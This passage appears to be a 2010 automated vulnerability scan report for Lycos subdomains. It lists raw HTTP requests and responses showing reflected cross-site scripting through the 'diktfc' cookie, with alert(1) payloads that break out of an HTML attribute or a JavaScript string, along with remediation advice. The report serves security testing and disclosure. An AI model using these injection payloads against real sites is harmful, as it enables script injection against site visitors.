GET /deals/stores/sony-style-716 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A34c81"%3balert(1)//0b0bfcb7a69; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:30:56 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:57 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 30211
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d333"><script>alert(1)</script>bb3b7fe1ad4 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/stores/sony-style-716 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1d333"><script>alert(1)</script>bb3b7fe1ad4; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:30:55 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:55 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 30258
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/stores/sony-style-716&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1d333"><script>alert(1)</script>bb3b7fe1ad4&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21e01"><script>alert(1)</script>b0e1e045cc1 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/stores/walmart-321 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A21e01"><script>alert(1)</script>b0e1e045cc1; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:31:13 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:14 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 47030
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/stores/walmart-321&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A21e01"><script>alert(1)</script>b0e1e045cc1&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d3eb"%3balert(1)//81b4caeacf4 was submitted in the diktfc cookie. This input was echoed as 9d3eb";alert(1)//81b4caeacf4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/stores/walmart-321 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A9d3eb"%3balert(1)//81b4caeacf4; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:31:15 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:15 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 47002
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c9bf"%3balert(1)//4aaaae1a092 was submitted in the diktfc cookie. This input was echoed as 7c9bf";alert(1)//4aaaae1a092 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7c9bf"%3balert(1)//4aaaae1a092; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response (redirected)
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:30:15 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:15 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 87695
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1501"><script>alert(1)</script>87fbb33321 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /search HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac1501"><script>alert(1)</script>87fbb33321; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response (redirected)
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:30:12 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:12 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 87723
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/index.php&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac1501"><script>alert(1)</script>87fbb33321&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33ede"%3balert(1)//7c98567bc37 was submitted in the diktfc cookie. This input was echoed as 33ede";alert(1)//7c98567bc37 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sitemap HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A33ede"%3balert(1)//7c98567bc37; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:33:24 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 28207
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aafee"><script>alert(1)</script>fbcae48b9db was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /sitemap HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aaafee"><script>alert(1)</script>fbcae48b9db; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:33:24 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 28237
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/sitemap&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aaafee"><script>alert(1)</script>fbcae48b9db&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63c5a"><script>alert(1)</script>3400436c004 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1 Host: info.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A63c5a"><script>alert(1)</script>3400436c004; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:34:03 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:03 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 15788
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info</title ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=info.lycos.com/index.php&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A63c5a"><script>alert(1)</script>3400436c004.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6579b"%3balert(1)//ffb8b1bf352 was submitted in the diktfc cookie. This input was echoed as 6579b";alert(1)//ffb8b1bf352 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: info.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A6579b"%3balert(1)//ffb8b1bf352; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:34:03 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:04 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 15758
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb3c4"><script>alert(1)</script>85e243e865f was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bootstrap.js HTTP/1.1 Host: info.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aeb3c4"><script>alert(1)</script>85e243e865f; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 14:34:15 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:15 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 15800
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info</title ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=info.lycos.com/index.php&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aeb3c4"><script>alert(1)</script>85e243e865f.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab342"%3balert(1)//c4c4ec323f6 was submitted in the diktfc cookie. This input was echoed as ab342";alert(1)//c4c4ec323f6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bootstrap.js HTTP/1.1 Host: info.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aab342"%3balert(1)//c4c4ec323f6; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 14:34:16 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:16 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 15770
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de0ae"><script>alert(1)</script>80df0ab27b8 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /contact.php HTTP/1.1 Host: info.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ade0ae"><script>alert(1)</script>80df0ab27b8; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:34:06 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:06 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 19563
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info - Cont ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=info.lycos.com/contact.php&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ade0ae"><script>alert(1)</script>80df0ab27b8.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 886fa"%3balert(1)//da603ed9901 was submitted in the diktfc cookie. This input was echoed as 886fa";alert(1)//da603ed9901 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /contact.php HTTP/1.1 Host: info.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A886fa"%3balert(1)//da603ed9901; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:34:06 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:06 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 19533
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info - Cont ...[SNIP]... <script type="text/javascript"> COMSCORE.beacon({ c1:2, c2:6036445, c3:"", c4:"info.lycos.com/contact.php", c5:"", c6:"", c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A886fa";alert(1)//da603ed9901.lycos.com" }); </script> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27849"%3balert(1)//a9b9c529a48 was submitted in the diktfc cookie. This input was echoed as 27849";alert(1)//a9b9c529a48 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /copyright.php HTTP/1.1 Host: info.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A27849"%3balert(1)//a9b9c529a48; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;
Response
